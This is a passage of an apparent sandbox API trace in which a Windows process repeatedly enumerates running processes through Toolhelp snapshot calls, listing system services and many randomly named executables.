Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) 
returned 1 [0147.034] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0147.036] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0147.037] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0147.039] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0147.040] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0147.042] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0147.044] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, 
szExeFile="pickup.exe")) returned 1 [0147.045] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0147.046] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0147.048] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0147.049] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0147.050] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0147.051] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0147.052] CloseHandle (hObject=0xc4) returned 1 [0147.052] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0147.057] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, 
cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0147.058] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0147.058] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0147.059] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0147.060] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0147.060] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0147.061] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0147.061] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, 
th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0147.062] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0147.063] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0147.064] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0147.065] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0147.065] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0147.066] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0147.067] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, 
th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x25, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0147.068] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0147.069] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0147.070] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0147.089] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0147.090] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0147.092] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0147.093] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, 
th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0147.095] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0147.097] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0147.098] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0147.100] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0147.101] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0147.102] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0147.103] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: 
lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0147.104] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0147.106] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0147.107] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0147.108] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0147.109] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0147.110] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0147.112] Process32NextW (in: hSnapshot=0xbc, 
lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0147.113] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0147.114] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0147.115] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0147.116] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0147.117] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0147.118] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0147.119] 
Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0147.120] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0147.121] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0147.122] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0147.123] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0147.124] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0147.125] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xba4, pcPriClassBase=8, dwFlags=0x0, szExeFile="LSfkRHur.exe")) 
returned 1 [0147.126] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="Sypykbck.exe")) returned 1 [0147.127] CloseHandle (hObject=0xbc) returned 1 [0147.127] Sleep (dwMilliseconds=0x12c) [0147.480] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0147.486] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0147.487] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0147.488] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0147.489] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0147.489] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0147.490] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, 
th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0147.490] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0147.491] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0147.492] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0147.492] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0147.493] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0147.494] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0147.494] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, 
th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0147.495] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0147.496] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x25, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0147.496] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0147.497] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0147.498] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, 